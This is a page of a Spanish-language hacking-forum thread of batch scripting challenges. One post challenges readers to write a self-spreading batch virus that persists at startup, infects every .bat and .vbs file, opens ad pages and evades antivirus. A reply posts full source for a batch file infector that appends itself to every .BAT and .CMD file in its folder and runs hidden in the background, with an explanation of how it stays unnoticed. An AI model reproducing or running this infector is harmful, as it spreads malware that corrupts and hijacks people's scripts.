elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  REtos batch
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 [4] 5 6 7 8 9 Ir Abajo Respuesta Imprimir
Autor Tema: REtos batch  (Leído 30,688 veces)
Stakewinner00


Desconectado Desconectado

Mensajes: 1.426



Ver Perfil WWW
Re: REtos batch
« Respuesta #30 en: 24 Abril 2012, 20:50 pm »

No encuentro el maldito error!!!!!!!!!! Estoy super estresado.
Código:
@echo off
:iniciar
if exist C:\re.bat goto :hola
copy "re.bat" "C:\"
if NOT exist C:\re.bat goto :iniciar
start C:\re.bat
del /f /q re.bat
exit

:hola
echo Hola!
pause
exit
No para de decirme no se encuentra el archivo especificado.

PD: Si laguien lo quiere intentar se debe ejecutar como administrador si no no se porque no dega modificarlo.


NO se si es eso pero has probado de poner ""
if exist "C:\re.bat" goto :hola no lo se seguro pero puede ser eso
"C:\re.bat" con comillas igual k if NOT exist "C:\re.bat" goto :iniciar


En línea

Puntoinfinito


Desconectado Desconectado

Mensajes: 919


#! /win/archlinux


Ver Perfil WWW
Re: REtos batch
« Respuesta #31 en: 24 Abril 2012, 20:54 pm »

Yo también soy catalan xD
Después de Edu voy yo, luego elektro o tu... Quiero ver si es capaz de hacerlo


En línea

AHORA EN SOFTONIC || CLICK HERE!!
Base64: QWNhYmFzIGRlIHBlcmRlciAxIG1pbnV0byBkZSB0dSB2aWRhLiBPbOkh



HACK AND 1337 : http://hackandleet.blogspot.com
WEBSITE: http://www.infiniterware.
$Edu$


Desconectado Desconectado

Mensajes: 1.842



Ver Perfil
Re: REtos batch
« Respuesta #32 en: 24 Abril 2012, 21:13 pm »

No encuentro el maldito error!!!!!!!!!! Estoy super estresado.
Código:
@echo off
:iniciar
if exist C:\re.bat goto :hola
copy "re.bat" "C:\"
if NOT exist C:\re.bat goto :iniciar
start C:\re.bat
del /f /q re.bat
exit

:hola
echo Hola!
pause
exit
No para de decirme no se encuentra el archivo especificado.

PD: Si laguien lo quiere intentar se debe ejecutar como administrador si no no se porque no dega modificarlo.

Ah pero te falta aprender mas aun, pensaba que algo de nocion tenias xDD broma jeje, pero es verdad.. xDD aprende sobre argumentos en batch, fijate que hace el %0 y planteate bien lo que queres hacer, no crees bucles innecesarios xD

"Claro como lo de edu es muy facil y lo terminare rapido me metere con tu reto" --> fail xD
En línea

ELVJop

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: REtos batch
« Respuesta #33 en: 24 Abril 2012, 22:00 pm »

estoy muy muy fail... Aviso de que si no lo consigo renuncio al reto... (No renunciare sin perder el ultimo aliento
En línea

El dia 3 de mayo esta cuenta sera borrada.
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: REtos batch
« Respuesta #34 en: 24 Abril 2012, 22:05 pm »

HOLA!!!

Mmm, queres un reto...

1ro crea un bat que se autocopie a startup
2do crea un bat que se inyecte a si mismo a todos los bats y vbs del disco
3ro crea un bat que abra una pagina de internet con publicidad
4to crea un bat que haga Melt

Uni todo y postea.

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
79137913


Desconectado Desconectado

Mensajes: 1.169


4 Esquinas


Ver Perfil WWW
Re: REtos batch
« Respuesta #35 en: 24 Abril 2012, 22:19 pm »

HOLA!!!

Que faltaba yo o mi reto?

PD: Agregale al bat que sea fud

GRACIAS POR LEER!!!
En línea

"Como no se puede igualar a Dios, ya he decidido que hacer, ¡SUPERARLO!"
"La peor de las ignorancias es no saber corregirlas"

 79137913                          *Shadow Scouts Team*
m0rf


Desconectado Desconectado

Mensajes: 828


BACK!


Ver Perfil
Re: REtos batch
« Respuesta #36 en: 24 Abril 2012, 22:40 pm »

Yo tambien soy catalan, en catalan seria numeros prims.

numeros prims xDDDD
En línea

Si todos fuéramos igual de inteligentes no existiría la mediocridad porque no podríamos apreciarla. Aprecias la mediocridad?
Binary_Death

Desconectado Desconectado

Mensajes: 214



Ver Perfil
Re: REtos batch
« Respuesta #37 en: 24 Abril 2012, 23:12 pm »

numeros prims xDDDD


No way! Es "Nombres primers"!

En línea

Binary_Death

Desconectado Desconectado

Mensajes: 214



Ver Perfil
Re: REtos batch
« Respuesta #38 en: 25 Abril 2012, 01:03 am »

HOLA!!!

Mmm, queres un reto...

1ro crea un bat que se autocopie a startup
2do crea un bat que se inyecte a si mismo a todos los bats y vbs del disco
3ro crea un bat que abra una pagina de internet con publicidad
4to crea un bat que haga Melt

Uni todo y postea.

GRACIAS POR LEER!!!

Respecto a ese reto... yo había hecho algo hace tiempo que servía para infectar ficheros por lotes de una forma decente.

Código
  1. @:_v_main
  2. @Echo Off %v_main%
  3. For /f "Tokens=* Delims=" %%i in ( %v_main%
  4.        'Dir/b *.BAT *.CMD' %v_main%
  5. ) Do Call:_Infect "%%~i" "%~0" %v_main%
  6. Exit/B 0 %v_main%
  7. :_Infect %v_main%
  8. Find "@::i_b_t"<"%~1">NUL && GoTo:EoF %v_main%
  9. For /f "Tokens=1 Delims=" %%_ in ( %v_main%
  10.        'Type "%~1"^|find /v /c ""^<"%~1"'%v_main%
  11. ) Do Set/A "beg_rg=%%_+1" & Set/A "end_rg=%%_+6" %v_main%
  12. ( %v_main%
  13.        Echo. %v_main%
  14.        Echo.@::i_b_t %v_main%
  15.        Echo.@Set "Str_R=v_ma" %v_main%
  16.        Echo.@GoTo:_%%~1 %v_main%
  17.        Echo.:_ %v_main%
  18.        Echo.@Start "" /B /high "%%~0" %%Str_R%%in %v_main%
  19. ) >> "%~1" %v_main%
  20. ( %v_main%
  21.        Echo.%beg_rg%,%end_rg%,1M %v_main%
  22.        Echo.E %v_main%
  23. )|Edlin /B %~1 %v_main%
  24. Find "v_main"<"%~2">>"%~1" %v_main%
  25. Goto:EoF %v_main%
  26.  

Lo bueno es que un .BAT infectado así permite que el malware corra oculto mientras se ejecuta el script huésped.
Usa lo que sería una especie de threads en batch, gracias a startb /b que crea una nueva instancia en el programa sin generar una nueva ventana.
De esa forma se genera la instancia del malware y después le da el control al script para su normal ejecución.
Eso también hace que la ejecución del malware pueda durar mucho tiempo sin que se noten efectos, ya que el programa huésped se ejecutará al instante.

Por cierto, la instancia del malware comparte el mismo handle de entrada y salida (y error) del programa huésped, así que se pueden hacer cosas divertidas haciendo por ejemplo que el programa huésped muestre algunos mensajes según las operaciones realizadas.
« Última modificación: 25 Abril 2012, 01:08 am por Binary_Death » En línea

ELVJop

Desconectado Desconectado

Mensajes: 132



Ver Perfil
Re: REtos batch
« Respuesta #39 en: 25 Abril 2012, 15:38 pm »

Aviso aqui que consegui el reto de edu jeje pero no estoy en el ordenador en el que lo tengo :S despues me metere y lo pongo.
En línea

El dia 3 de mayo esta cuenta sera borrada.
Páginas: 1 2 3 [4] 5 6 7 8 9 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Retos
Desafíos - Wargames
@synthesize 8 9,281 Último mensaje 13 Junio 2010, 04:24 am
por @synthesize
Retos C/C++ « 1 2 ... 8 9 »
Ejercicios
[L]ord [R]NA 85 52,965 Último mensaje 3 Octubre 2010, 16:57 pm
por Komodo
Retos .Net « 1 2 3 »
Ejercicios
[D4N93R] 20 19,232 Último mensaje 6 Diciembre 2010, 03:26 am
por final_frontier
¿Quieren retos de Batch? « 1 2 »
Scripting
Eleкtro 18 7,688 Último mensaje 5 Mayo 2012, 08:27 am
por Eleкtro
[Batch] Insertar un batch dentro de un batch que fabrique un .txt
Scripting
$pedrojo2704 2 5,556 Último mensaje 23 Agosto 2012, 10:08 am
por $pedrojo2704
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines